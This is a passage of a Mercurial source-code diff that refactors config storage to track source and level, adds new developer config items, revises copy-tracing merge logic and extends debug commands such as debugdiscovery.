+ def _get(self, section, item):
+ return self._data.get(section, {}).get(item)
def get(self, section, item, default=None):
- return self._data.get(section, {}).get(item, default)
+ result = self._get(section, item)
+ if result is None:
+ return default
+ return result[0]
- def backup(self, section, item):
+ def backup(self, section, key):
"""return a tuple allowing restore to reinstall a previous value
The main reason we need it is because it handles the "no data" case.
"""
try:
- value = self._data[section][item]
- source = self.source(section, item)
- return (section, item, value, source)
+ item = self._data[section][key]
except KeyError:
- return (section, item)
+ return (section, key)
+ else:
+ return (section, key) + item
def source(self, section, item):
- return self._source.get((section, item), b"")
+ result = self._get(section, item)
+ if result is None:
+ return b""
+ return result[1]
+
+ def level(self, section, item):
+ result = self._get(section, item)
+ if result is None:
+ return None
+ return result[2]
def sections(self):
return sorted(self._data.keys())
def items(self, section):
- return list(pycompat.iteritems(self._data.get(section, {})))
+ items = pycompat.iteritems(self._data.get(section, {}))
+ return [(k, v[0]) for (k, v) in items]
def set(self, section, item, value, source=b""):
if pycompat.ispy3:
@@ -103,26 +129,31 @@
self._data[section] = util.cowsortdict()
else:
self._data[section] = self._data[section].preparewrite()
- self._data[section][item] = value
- if source:
- self._source = self._source.preparewrite()
- self._source[(section, item)] = source
+ self._data[section][item] = (value, source, self._current_source_level)
+
+ def alter(self, section, key, new_value):
+ """alter a value without altering its source or level
+
+ This method is meant to be used by `ui.fixconfig` only."""
+ item = self._data[section][key]
+ size = len(item)
+ new_item = (new_value,) + item[1:]
+ assert len(new_item) == size
+ self._data[section][key] = new_item
def restore(self, data):
"""restore data returned by self.backup"""
- self._source = self._source.preparewrite()
- if len(data) == 4:
+ if len(data) != 2:
# restore old data
- section, item, value, source = data
+ section, key = data[:2]
+ item = data[2:]
self._data[section] = self._data[section].preparewrite()
- self._data[section][item] = value
- self._source[(section, item)] = source
+ self._data[section][key] = item
else:
# no data before, remove everything
section, item = data
if section in self._data:
self._data[section].pop(item, None)
- self._source.pop((section, item), None)
def parse(self, src, data, sections=None, remap=None, include=None):
sectionre = util.re.compile(br'\[([^\[]+)\]')
@@ -206,6 +237,7 @@
raise error.ConfigError(message, (b"%s:%d" % (src, line)))
def read(self, path, fp=None, sections=None, remap=None):
+ self.new_source()
if not fp:
fp = util.posixfile(path, b'rb')
assert (
@@ -220,6 +252,8 @@
def include(rel, remap, sections):
abs = os.path.normpath(os.path.join(dir, rel))
self.read(abs, remap=remap, sections=sections)
+ # anything after the include has a higher level
+ self.new_source()
self.parse(
path, fp.read(), sections=sections, remap=remap, include=include
--- a/mercurial/configitems.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/configitems.py Tue Apr 20 11:01:06 2021 -0400
@@ -570,11 +570,21 @@
default=0,
)
coreconfigitem(
+ b'convert',
+ b'svn.dangerous-set-commit-dates',
+ default=False,
+)
+coreconfigitem(
b'debug',
b'dirstate.delaywrite',
default=0,
)
coreconfigitem(
+ b'debug',
+ b'revlog.verifyposition.changelog',
+ default=b'',
+)
+coreconfigitem(
b'defaults',
b'.*',
default=None,
@@ -610,6 +620,12 @@
b'check-relroot',
default=False,
)
+# Track copy information for all file, not just "added" one (very slow)
+coreconfigitem(
+ b'devel',
+ b'copy-tracing.trace-all-files',
+ default=False,
+)
coreconfigitem(
b'devel',
b'default-date',
@@ -689,6 +705,11 @@
)
coreconfigitem(
b'devel',
+ b'copy-tracing.multi-thread',
+ default=True,
+)
+coreconfigitem(
+ b'devel',
b'debug.extensions',
default=False,
)
@@ -716,6 +737,14 @@
b'discovery.grow-sample',
default=True,
)
+# When discovery.grow-sample.dynamic is True, the default, the sample size is
+# adapted to the shape of the undecided set (it is set to the max of:
+# <target-size>, len(roots(undecided)), len(heads(undecided)
+coreconfigitem(
+ b'devel',
+ b'discovery.grow-sample.dynamic',
+ default=True,
+)
# discovery.grow-sample.rate control the rate at which the sample grow
coreconfigitem(
b'devel',
@@ -729,8 +758,26 @@
b'discovery.randomize',
default=True,
)
+# Control the initial size of the discovery sample
+coreconfigitem(
+ b'devel',
+ b'discovery.sample-size',
+ default=200,
+)
+# Control the initial size of the discovery for initial change
+coreconfigitem(
+ b'devel',
+ b'discovery.sample-size.initial',
+ default=100,
+)
_registerdiffopts(section=b'diff')
coreconfigitem(
+ b'diff',
+ b'merge',
+ default=False,
+ experimental=True,
+)
+coreconfigitem(
b'email',
b'bcc',
default=None,
@@ -827,6 +874,31 @@
)
coreconfigitem(
b'experimental',
+ b'bundlecompthreads',
+ default=None,
+)
+coreconfigitem(
+ b'experimental',
+ b'bundlecompthreads.bzip2',
+ default=None,
+)
+coreconfigitem(
+ b'experimental',
+ b'bundlecompthreads.gzip',
+ default=None,
+)
+coreconfigitem(
+ b'experimental',
+ b'bundlecompthreads.none',
+ default=None,
+)
+coreconfigitem(
+ b'experimental',
+ b'bundlecompthreads.zstd',
+ default=None,
+)
+coreconfigitem(
+ b'experimental',
b'changegroup3',
default=False,
)
@@ -1235,7 +1307,7 @@
coreconfigitem(
b'format',
b'revlog-compression',
- default=lambda: [b'zlib'],
+ default=lambda: [b'zstd', b'zlib'],
alias=[(b'experimental', b'format.compression')],
)
coreconfigitem(
@@ -1253,10 +1325,36 @@
b'usestore',
default=True,
)
+
+
+def _persistent_nodemap_default():
+ """compute `use-persistent-nodemap` default value
+
+ The feature is disabled unless a fast implementation is available.
+ """
+ from . import policy
+
+ return policy.importrust('revlog') is not None
+
+
coreconfigitem(
b'format',
b'use-persistent-nodemap',
+ default=_persistent_nodemap_default,
+)
+# TODO needs to grow a docket file to at least store the last offset of the data
+# file when rewriting sidedata.
+# Will also need a way of dealing with garbage data if we allow rewriting
+# *existing* sidedata.
+# Exchange-wise, we will also need to do something more efficient than keeping
+# references to the affected revlogs, especially memory-wise when rewriting
+# sidedata.
+# Also... compress the sidedata? (this should be coming very soon)
+coreconfigitem(
+ b'format',
+ b'exp-revlogv2.2',
default=False,
+ experimental=True,
)
coreconfigitem(
b'format',
--- a/mercurial/context.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/context.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# context.py - changeset and file context objects for mercurial
#
-# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -2599,6 +2599,7 @@
b'flags': flags,
b'copied': copied,
}
+ util.clearcachedproperty(self, b'_manifest')
def filectx(self, path, filelog=None):
return overlayworkingfilectx(
@@ -2884,7 +2885,7 @@
# "1 < len(self._parents)" can't be used for checking
# existence of the 2nd parent, because "memctx._parents" is
# explicitly initialized by the list, of which length is 2.
- if p2.node() != nullid:
+ if p2.rev() != nullrev:
man2 = p2.manifest()
managing = lambda f: f in man1 or f in man2
else:
@@ -2902,7 +2903,7 @@
return scmutil.status(modified, added, removed, [], [], [], [])
def parents(self):
- if self._parents[1].node() == nullid:
+ if self._parents[1].rev() == nullrev:
return [self._parents[0]]
return self._parents
@@ -2999,7 +3000,7 @@
parents = [repo[p] for p in parents if p is not None]
parents = parents[:]
while len(parents) < 2:
- parents.append(repo[nullid])
+ parents.append(repo[nullrev])
p1, p2 = self._parents = parents
# sanity check to ensure that the reused manifest parents are
@@ -3051,7 +3052,7 @@
# "1 < len(self._parents)" can't be used for checking
# existence of the 2nd parent, because "metadataonlyctx._parents" is
# explicitly initialized by the list, of which length is 2.
- if p2.node() != nullid:
+ if p2.rev() != nullrev:
man2 = p2.manifest()
managing = lambda f: f in man1 or f in man2
else:
--- a/mercurial/copies.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/copies.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# coding: utf8
# copies.py - copy detection for Mercurial
#
-# Copyright 2008 Matt Mackall <mpm@selenic.com>
+# Copyright 2008 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -59,14 +59,13 @@
# Cases 1, 3, and 5 are then removed by _filter().
for k, v in list(t.items()):
- # remove copies from files that didn't exist
- if v not in src:
+ if k == v: # case 3
del t[k]
- # remove criss-crossed copies
- elif k in src and v in dst:
+ elif v not in src: # case 5
+ # remove copies from files that didn't exist
del t[k]
- # remove copies to files that were then removed
- elif k not in dst:
+ elif k not in dst: # case 1
+ # remove copies to files that were then removed
del t[k]
@@ -150,16 +149,24 @@
# optimization, since the ctx.files() for a merge commit is not correct for
# this comparison.
forwardmissingmatch = match
- if b.p1() == a and b.p2().node() == nullid:
+ if b.p1() == a and b.p2().rev() == nullrev:
filesmatcher = matchmod.exact(b.files())
forwardmissingmatch = matchmod.intersectmatchers(match, filesmatcher)
- missing = _computeforwardmissing(a, b, match=forwardmissingmatch)
+ if repo.ui.configbool(b'devel', b'copy-tracing.trace-all-files'):
+ missing = list(b.walk(match))
+ # _computeforwardmissing(a, b, match=forwardmissingmatch)
+ if debug:
+ dbg(b'debug.copies: searching all files: %d\n' % len(missing))
+ else:
+ missing = _computeforwardmissing(a, b, match=forwardmissingmatch)
+ if debug:
+ dbg(
+ b'debug.copies: missing files to search: %d\n'
+ % len(missing)
+ )
ancestrycontext = a._repo.changelog.ancestors([b.rev()], inclusive=True)
- if debug:
- dbg(b'debug.copies: missing files to search: %d\n' % len(missing))
-
for f in sorted(missing):
if debug:
dbg(b'debug.copies: tracing file: %s\n' % f)
@@ -267,6 +274,7 @@
revs = cl.findmissingrevs(common=[a.rev()], heads=[b.rev()])
roots = set()
has_graph_roots = False
+ multi_thread = repo.ui.configbool(b'devel', b'copy-tracing.multi-thread')
# iterate over `only(B, A)`
for r in revs:
@@ -314,7 +322,13 @@
children_count[p] += 1
revinfo = _revinfo_getter(repo, match)
return _combine_changeset_copies(
- revs, children_count, b.rev(), revinfo, match, isancestor
+ revs,
+ children_count,
+ b.rev(),
+ revinfo,
+ match,
+ isancestor,
+ multi_thread,
)
else:
# When not using side-data, we will process the edges "from" the parent.
@@ -339,7 +353,7 @@
def _combine_changeset_copies(
- revs, children_count, targetrev, revinfo, match, isancestor
+ revs, children_count, targetrev, revinfo, match, isancestor, multi_thread
):
"""combine the copies information for each item of iterrevs
@@ -356,7 +370,7 @@
if rustmod is not None:
final_copies = rustmod.combine_changeset_copies(
- list(revs), children_count, targetrev, revinfo, isancestor
+ list(revs), children_count, targetrev, revinfo, multi_thread
)
else:
isancestor = cached_is_ancestor(isancestor)
@@ -427,7 +441,11 @@
# potential filelog related behavior.
assert parent == 2
current_copies = _merge_copies_dict(
- newcopies, current_copies, isancestor, changes
+ newcopies,
+ current_copies,
+ isancestor,
+ changes,
+ current_rev,
)
all_copies[current_rev] = current_copies
@@ -449,7 +467,7 @@
PICK_EITHER = 2
-def _merge_copies_dict(minor, major, isancestor, changes):
+def _merge_copies_dict(minor, major, isancestor, changes, current_merge):
"""merge two copies-mapping together, minor and major
In case of conflict, value from "major" will be picked.
@@ -467,39 +485,75 @@
if other is None:
minor[dest] = value
else:
- pick = _compare_values(changes, isancestor, dest, other, value)
- if pick == PICK_MAJOR:
+ pick, overwrite = _compare_values(
+ changes, isancestor, dest, other, value
+ )
+ if overwrite:
+ if pick == PICK_MAJOR:
+ minor[dest] = (current_merge, value[1])
+ else:
+ minor[dest] = (current_merge, other[1])
+ elif pick == PICK_MAJOR:
minor[dest] = value
return minor
def _compare_values(changes, isancestor, dest, minor, major):
- """compare two value within a _merge_copies_dict loop iteration"""
+ """compare two value within a _merge_copies_dict loop iteration
+
+ return (pick, overwrite).
+
+ - pick is one of PICK_MINOR, PICK_MAJOR or PICK_EITHER
+ - overwrite is True if pick is a return of an ambiguity that needs resolution.
+ """
major_tt, major_value = major
minor_tt, minor_value = minor
- # evacuate some simple case first:
if major_tt == minor_tt:
# if it comes from the same revision it must be the same value
assert major_value == minor_value
- return PICK_EITHER
- elif major[1] == minor[1]:
- return PICK_EITHER
-
- # actual merging needed: content from "major" wins, unless it is older than
- # the branch point or there is a merge
- elif changes is not None and major[1] is None and dest in changes.salvaged:
- return PICK_MINOR
- elif changes is not None and minor[1] is None and dest in changes.salvaged:
- return PICK_MAJOR
- elif changes is not None and dest in changes.merged:
- return PICK_MAJOR
- elif not isancestor(major_tt, minor_tt):
- if major[1] is not None:
- return PICK_MAJOR
- elif isancestor(minor_tt, major_tt):
- return PICK_MAJOR
- return PICK_MINOR
+ return PICK_EITHER, False
+ elif (
+ changes is not None
+ and minor_value is not None
+ and major_value is None
+ and dest in changes.salvaged
+ ):
+ # In this case, a deletion was reverted, the "alive" value overwrite
+ # the deleted one.
+ return PICK_MINOR, True
+ elif (
+ changes is not None
+ and major_value is not None
+ and minor_value is None
+ and dest in changes.salvaged
+ ):
+ # In this case, a deletion was reverted, the "alive" value overwrite
+ # the deleted one.
+ return PICK_MAJOR, True
+ elif isancestor(minor_tt, major_tt):
+ if changes is not None and dest in changes.merged:
+ # change to dest happened on the branch without copy-source change,
+ # so both source are valid and "major" wins.
+ return PICK_MAJOR, True
+ else:
+ return PICK_MAJOR, False
+ elif isancestor(major_tt, minor_tt):
+ if changes is not None and dest in changes.merged:
+ # change to dest happened on the branch without copy-source change,
+ # so both source are valid and "major" wins.
+ return PICK_MAJOR, True
+ else:
+ return PICK_MINOR, False
+ elif minor_value is None:
+ # in case of conflict, the "alive" side wins.
+ return PICK_MAJOR, True
+ elif major_value is None:
+ # in case of conflict, the "alive" side wins.
+ return PICK_MINOR, True
+ else:
+ # in case of conflict where both side are alive, major wins.
+ return PICK_MAJOR, True
def _revinfo_getter_extra(repo):
@@ -650,22 +704,28 @@
def _backwardrenames(a, b, match):
+ """find renames from a to b"""
if a._repo.ui.config(b'experimental', b'copytrace') == b'off':
return {}
+ # We don't want to pass in "match" here, since that would filter
+ # the destination by it. Since we're reversing the copies, we want
+ # to filter the source instead.
+ copies = _forwardcopies(b, a)
+ return _reverse_renames(copies, a, match)
+
+
+def _reverse_renames(copies, dst, match):
+ """given copies to context 'dst', finds renames from that context"""
# Even though we're not taking copies into account, 1:n rename situations
# can still exist (e.g. hg cp a b; hg mv a c). In those cases we
# arbitrarily pick one of the renames.
- # We don't want to pass in "match" here, since that would filter
- # the destination by it. Since we're reversing the copies, we want
- # to filter the source instead.
- f = _forwardcopies(b, a)
r = {}
- for k, v in sorted(pycompat.iteritems(f)):
+ for k, v in sorted(pycompat.iteritems(copies)):
if match and not match(v):
continue
# remove copies
- if v in a:
+ if v in dst:
continue
r[v] = k
return r
@@ -701,9 +761,17 @@
base = None
if a.rev() != nullrev:
base = x
+ x_copies = _forwardcopies(a, x)
+ y_copies = _forwardcopies(a, y, base, match=match)
+ same_keys = set(x_copies) & set(y_copies)
+ for k in same_keys:
+ if x_copies.get(k) == y_copies.get(k):
+ del x_copies[k]
+ del y_copies[k]
+ x_backward_renames = _reverse_renames(x_copies, x, match)
copies = _chain(
- _backwardrenames(x, a, match=match),
- _forwardcopies(a, y, base, match=match),
+ x_backward_renames,
+ y_copies,
)
_filter(x, y, copies)
return copies
@@ -1042,11 +1110,17 @@
b" discovered dir src: '%s' -> dst: '%s'\n" % (d, dirmove[d])
)
+ # Sort the directories in reverse order, so we find children first
+ # For example, if dir1/ was renamed to dir2/, and dir1/subdir1/
+ # was renamed to dir2/subdir2/, we want to move dir1/subdir1/file
+ # to dir2/subdir2/file (not dir2/subdir1/file)
+ dirmove_children_first = sorted(dirmove, reverse=True)
+
movewithdir = {}
# check unaccounted nonoverlapping files against directory moves
for f in addedfilesfn():
if f not in fullcopy:
- for d in dirmove:
+ for d in dirmove_children_first:
if f.startswith(d):
# new file added in a directory that was moved, move it
df = dirmove[d] + f[len(d) :]
@@ -1220,6 +1294,15 @@
by merge.update().
"""
new_copies = pathcopies(base, ctx)
- _filter(wctx.p1(), wctx, new_copies)
+ parent = wctx.p1()
+ _filter(parent, wctx, new_copies)
+ # Extra filtering to drop copy information for files that existed before
+ # the graft. This is to handle the case of grafting a rename onto a commit
+ # that already has the rename. Otherwise the presence of copy information
+ # would result in the creation of an empty commit where we would prefer to
+ # not create one.
+ for dest, __ in list(new_copies.items()):
+ if dest in parent:
+ del new_copies[dest]
for dst, src in pycompat.iteritems(new_copies):
wctx[dst].markcopied(src)
--- a/mercurial/dagop.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/dagop.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# dagop.py - graph ancestry and topology algorithm for revset
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/debugcommands.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/debugcommands.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# debugcommands.py - command processing for debug* commands
#
-# Copyright 2005-2016 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2016 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -9,6 +9,7 @@
import codecs
import collections
+import contextlib
import difflib
import errno
import glob
@@ -69,6 +70,7 @@
pycompat,
registrar,
repair,
+ repoview,
revlog,
revset,
revsetlang,
@@ -96,6 +98,7 @@
dateutil,
procutil,
stringutil,
+ urlutil,
)
from .revlogutils import (
@@ -345,7 +348,7 @@
def showchunks(named):
ui.write(b"\n%s%s\n" % (indent_string, named))
for deltadata in gen.deltaiter():
- node, p1, p2, cs, deltabase, delta, flags = deltadata
+ node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata
ui.write(
b"%s%s %s %s %s %s %d\n"
% (
@@ -371,7 +374,7 @@
raise error.Abort(_(b'use debugbundle2 for this file'))
gen.changelogheader()
for deltadata in gen.deltaiter():
- node, p1, p2, cs, deltabase, delta, flags = deltadata
+ node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata
ui.write(b"%s%s\n" % (indent_string, hex(node)))
@@ -470,27 +473,47 @@
"""lists the capabilities of a remote peer"""
opts = pycompat.byteskwargs(opts)
peer = hg.peer(ui, opts, path)
- caps = peer.capabilities()
- ui.writenoi18n(b'Main capabilities:\n')
- for c in sorted(caps):
- ui.write(b' %s\n' % c)
- b2caps = bundle2.bundle2caps(peer)
- if b2caps:
- ui.writenoi18n(b'Bundle2 capabilities:\n')
- for key, values in sorted(pycompat.iteritems(b2caps)):
- ui.write(b' %s\n' % key)
- for v in values:
- ui.write(b' %s\n' % v)
-
-
-@command(b'debugchangedfiles', [], b'REV')
-def debugchangedfiles(ui, repo, rev):
+ try:
+ caps = peer.capabilities()
+ ui.writenoi18n(b'Main capabilities:\n')
+ for c in sorted(caps):
+ ui.write(b' %s\n' % c)
+ b2caps = bundle2.bundle2caps(peer)
+ if b2caps:
+ ui.writenoi18n(b'Bundle2 capabilities:\n')
+ for key, values in sorted(pycompat.iteritems(b2caps)):
+ ui.write(b' %s\n' % key)
+ for v in values:
+ ui.write(b' %s\n' % v)
+ finally:
+ peer.close()
+
+
+@command(
+ b'debugchangedfiles',
+ [
+ (
+ b'',
+ b'compute',
+ False,
+ b"compute information instead of reading it from storage",
+ ),
+ ],
+ b'REV',
+)
+def debugchangedfiles(ui, repo, rev, **opts):
"""list the stored files changes for a revision"""
ctx = scmutil.revsingle(repo, rev, None)
- sd = repo.changelog.sidedata(ctx.rev())
- files_block = sd.get(sidedata.SD_FILES)
- if files_block is not None:
- files = metadata.decode_files_sidedata(sd)
+ files = None
+
+ if opts['compute']:
+ files = metadata.compute_all_files_changes(ctx)
+ else:
+ sd = repo.changelog.sidedata(ctx.rev())
+ files_block = sd.get(sidedata.SD_FILES)
+ if files_block is not None:
+ files = metadata.decode_files_sidedata(sd)
+ if files is not None:
for f in sorted(files.touched):
if f in files.added:
action = b"added"
@@ -964,20 +987,111 @@
),
(b'', b'rev', [], b'restrict discovery to this set of revs'),
(b'', b'seed', b'12323', b'specify the random seed use for discovery'),
+ (
+ b'',
+ b'local-as-revs',
+ b"",
+ b'treat local has having these revisions only',
+ ),
+ (
+ b'',
+ b'remote-as-revs',
+ b"",
+ b'use local as remote, with only these these revisions',
+ ),
]
- + cmdutil.remoteopts,
+ + cmdutil.remoteopts
+ + cmdutil.formatteropts,
_(b'[--rev REV] [OTHER]'),
)
def debugdiscovery(ui, repo, remoteurl=b"default", **opts):
- """runs the changeset discovery protocol in isolation"""
+ """runs the changeset discovery protocol in isolation
+
+ The local peer can be "replaced" by a subset of the local repository by
+ using the `--local-as-revs` flag. Int he same way, usual `remote` peer can
+ be "replaced" by a subset of the local repository using the
+ `--local-as-revs` flag. This is useful to efficiently debug pathological
+ discovery situation.
+
+ The following developer oriented config are relevant for people playing with this command:
+
+ * devel.discovery.exchange-heads=True
+
+ If False, the discovery will not start with
+ remote head fetching and local head querying.
+
+ * devel.discovery.grow-sample=True
+
+ If False, the sample size used in set discovery will not be increased
+ through the process
+
+ * devel.discovery.grow-sample.dynamic=True
+
+ When discovery.grow-sample.dynamic is True, the default, the sample size is
+ adapted to the shape of the undecided set (it is set to the max of:
+ <target-size>, len(roots(undecided)), len(heads(undecided)
+
+ * devel.discovery.grow-sample.rate=1.05
+
+ the rate at which the sample grow
+
+ * devel.discovery.randomize=True
+
+ If andom sampling during discovery are deterministic. It is meant for
+ integration tests.
+
+ * devel.discovery.sample-size=200
+
+ Control the initial size of the discovery sample
+
+ * devel.discovery.sample-size.initial=100
+
+ Control the initial size of the discovery for initial change
+ """
opts = pycompat.byteskwargs(opts)
- remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl))
- remote = hg.peer(repo, opts, remoteurl)
- ui.status(_(b'comparing with %s\n') % util.hidepassword(remoteurl))
+ unfi = repo.unfiltered()
+
+ # setup potential extra filtering
+ local_revs = opts[b"local_as_revs"]
+ remote_revs = opts[b"remote_as_revs"]
# make sure tests are repeatable
random.seed(int(opts[b'seed']))
+ if not remote_revs:
+
+ remoteurl, branches = urlutil.get_unique_pull_path(
+ b'debugdiscovery', repo, ui, remoteurl
+ )
+ remote = hg.peer(repo, opts, remoteurl)
+ ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(remoteurl))
+ else:
+ branches = (None, [])
+ remote_filtered_revs = scmutil.revrange(
+ unfi, [b"not (::(%s))" % remote_revs]
+ )
+ remote_filtered_revs = frozenset(remote_filtered_revs)
+
+ def remote_func(x):
+ return remote_filtered_revs
+
+ repoview.filtertable[b'debug-discovery-remote-filter'] = remote_func
+
+ remote = repo.peer()
+ remote._repo = remote._repo.filtered(b'debug-discovery-remote-filter')
+
+ if local_revs:
+ local_filtered_revs = scmutil.revrange(
+ unfi, [b"not (::(%s))" % local_revs]
+ )
+ local_filtered_revs = frozenset(local_filtered_revs)
+
+ def local_func(x):
+ return local_filtered_revs
+
+ repoview.filtertable[b'debug-discovery-local-filter'] = local_func
+ repo = repo.filtered(b'debug-discovery-local-filter')
+
data = {}
if opts.get(b'old'):
@@ -1014,8 +1128,21 @@
remoterevs, _checkout = hg.addbranchrevs(repo, remote, branches, revs=None)
localrevs = opts[b'rev']
- with util.timedcm('debug-discovery') as t:
- common, hds = doit(localrevs, remoterevs)
+
+ fm = ui.formatter(b'debugdiscovery', opts)
+ if fm.strict_format:
+
+ @contextlib.contextmanager
+ def may_capture_output():
+ ui.pushbuffer()
+ yield
+ data[b'output'] = ui.popbuffer()
+
+ else:
+ may_capture_output = util.nullcontextmanager
+ with may_capture_output():
+ with util.timedcm('debug-discovery') as t:
+ common, hds = doit(localrevs, remoterevs)
# compute all statistics
heads_common = set(common)
@@ -1066,50 +1193,41 @@
data[b'nb-ini_und-common'] = len(common_initial_undecided)
data[b'nb-ini_und-missing'] = len(missing_initial_undecided)
+ fm.startitem()
+ fm.data(**pycompat.strkwargs(data))
# display discovery summary
- ui.writenoi18n(b"elapsed time: %(elapsed)f seconds\n" % data)
- ui.writenoi18n(b"round-trips: %(total-roundtrips)9d\n" % data)
- ui.writenoi18n(b"heads summary:\n")
- ui.writenoi18n(b" total common heads: %(nb-common-heads)9d\n" % data)
- ui.writenoi18n(
- b" also local heads: %(nb-common-heads-local)9d\n" % data
- )
- ui.writenoi18n(
- b" also remote heads: %(nb-common-heads-remote)9d\n" % data
- )
- ui.writenoi18n(b" both: %(nb-common-heads-both)9d\n" % data)
- ui.writenoi18n(b" local heads: %(nb-head-local)9d\n" % data)
- ui.writenoi18n(
- b" common: %(nb-common-heads-local)9d\n" % data
- )
- ui.writenoi18n(
- b" missing: %(nb-head-local-missing)9d\n" % data
- )
- ui.writenoi18n(b" remote heads: %(nb-head-remote)9d\n" % data)
- ui.writenoi18n(
- b" common: %(nb-common-heads-remote)9d\n" % data
- )
- ui.writenoi18n(
- b" unknown: %(nb-head-remote-unknown)9d\n" % data
- )
- ui.writenoi18n(b"local changesets: %(nb-revs)9d\n" % data)
- ui.writenoi18n(b" common: %(nb-revs-common)9d\n" % data)
- ui.writenoi18n(b" heads: %(nb-common-heads)9d\n" % data)
- ui.writenoi18n(b" roots: %(nb-common-roots)9d\n" % data)
- ui.writenoi18n(b" missing: %(nb-revs-missing)9d\n" % data)
- ui.writenoi18n(b" heads: %(nb-missing-heads)9d\n" % data)
- ui.writenoi18n(b" roots: %(nb-missing-roots)9d\n" % data)
- ui.writenoi18n(b" first undecided set: %(nb-ini_und)9d\n" % data)
- ui.writenoi18n(b" heads: %(nb-ini_und-heads)9d\n" % data)
- ui.writenoi18n(b" roots: %(nb-ini_und-roots)9d\n" % data)
- ui.writenoi18n(b" common: %(nb-ini_und-common)9d\n" % data)
- ui.writenoi18n(b" missing: %(nb-ini_und-missing)9d\n" % data)
+ fm.plain(b"elapsed time: %(elapsed)f seconds\n" % data)
+ fm.plain(b"round-trips: %(total-roundtrips)9d\n" % data)
+ fm.plain(b"heads summary:\n")
+ fm.plain(b" total common heads: %(nb-common-heads)9d\n" % data)
+ fm.plain(b" also local heads: %(nb-common-heads-local)9d\n" % data)
+ fm.plain(b" also remote heads: %(nb-common-heads-remote)9d\n" % data)
+ fm.plain(b" both: %(nb-common-heads-both)9d\n" % data)
+ fm.plain(b" local heads: %(nb-head-local)9d\n" % data)
+ fm.plain(b" common: %(nb-common-heads-local)9d\n" % data)
+ fm.plain(b" missing: %(nb-head-local-missing)9d\n" % data)
+ fm.plain(b" remote heads: %(nb-head-remote)9d\n" % data)
+ fm.plain(b" common: %(nb-common-heads-remote)9d\n" % data)
+ fm.plain(b" unknown: %(nb-head-remote-unknown)9d\n" % data)
+ fm.plain(b"local changesets: %(nb-revs)9d\n" % data)
+ fm.plain(b" common: %(nb-revs-common)9d\n" % data)
+ fm.plain(b" heads: %(nb-common-heads)9d\n" % data)
+ fm.plain(b" roots: %(nb-common-roots)9d\n" % data)
+ fm.plain(b" missing: %(nb-revs-missing)9d\n" % data)
+ fm.plain(b" heads: %(nb-missing-heads)9d\n" % data)
+ fm.plain(b" roots: %(nb-missing-roots)9d\n" % data)
+ fm.plain(b" first undecided set: %(nb-ini_und)9d\n" % data)
+ fm.plain(b" heads: %(nb-ini_und-heads)9d\n" % data)
+ fm.plain(b" roots: %(nb-ini_und-roots)9d\n" % data)
+ fm.plain(b" common: %(nb-ini_und-common)9d\n" % data)
+ fm.plain(b" missing: %(nb-ini_und-missing)9d\n" % data)
if ui.verbose:
- ui.writenoi18n(
+ fm.plain(
b"common heads: %s\n"
% b" ".join(sorted(short(n) for n in heads_common))
)
+ fm.end()
_chunksize = 4 << 10
@@ -2214,9 +2332,9 @@
b'',
b'dump-new',
False,
- _(b'write a (new) persistent binary nodemap on stdin'),
+ _(b'write a (new) persistent binary nodemap on stdout'),
),
- (b'', b'dump-disk', False, _(b'dump on-disk data on stdin')),
+ (b'', b'dump-disk', False, _(b'dump on-disk data on stdout')),
(
b'',
b'check',
@@ -2546,12 +2664,17 @@
with ui.configoverride(overrides):
peer = hg.peer(ui, {}, path)
- local = peer.local() is not None
- canpush = peer.canpush()
-
- ui.write(_(b'url: %s\n') % peer.url())
- ui.write(_(b'local: %s\n') % (_(b'yes') if local else _(b'no')))
- ui.write(_(b'pushable: %s\n') % (_(b'yes') if canpush else _(b'no')))
+ try:
+ local = peer.local() is not None
+ canpush = peer.canpush()
+
+ ui.write(_(b'url: %s\n') % peer.url())
+ ui.write(_(b'local: %s\n') % (_(b'yes') if local else _(b'no')))
+ ui.write(
+ _(b'pushable: %s\n') % (_(b'yes') if canpush else _(b'no'))
+ )
+ finally:
+ peer.close()
@command(
@@ -2654,26 +2777,30 @@
"""
target = hg.peer(ui, {}, repopath)
- if keyinfo:
- key, old, new = keyinfo
- with target.commandexecutor() as e:
- r = e.callcommand(
- b'pushkey',
- {
- b'namespace': namespace,
- b'key': key,
- b'old': old,
- b'new': new,
- },
- ).result()
-
- ui.status(pycompat.bytestr(r) + b'\n')
- return not r
- else:
- for k, v in sorted(pycompat.iteritems(target.listkeys(namespace))):
- ui.write(
- b"%s\t%s\n" % (stringutil.escapestr(k), stringutil.escapestr(v))
- )
+ try:
+ if keyinfo:
+ key, old, new = keyinfo
+ with target.commandexecutor() as e:
+ r = e.callcommand(
+ b'pushkey',
+ {
+ b'namespace': namespace,
+ b'key': key,
+ b'old': old,
+ b'new': new,
+ },
+ ).result()
+
+ ui.status(pycompat.bytestr(r) + b'\n')
+ return not r
+ else:
+ for k, v in sorted(pycompat.iteritems(target.listkeys(namespace))):
+ ui.write(
+ b"%s\t%s\n"
+ % (stringutil.escapestr(k), stringutil.escapestr(v))
+ )
+ finally:
+ target.close()
@command(b'debugpvec', [], _(b'A B'))
@@ -3527,8 +3654,10 @@
)
source = b"default"
- source, branches = hg.parseurl(ui.expandpath(source))
- url = util.url(source)
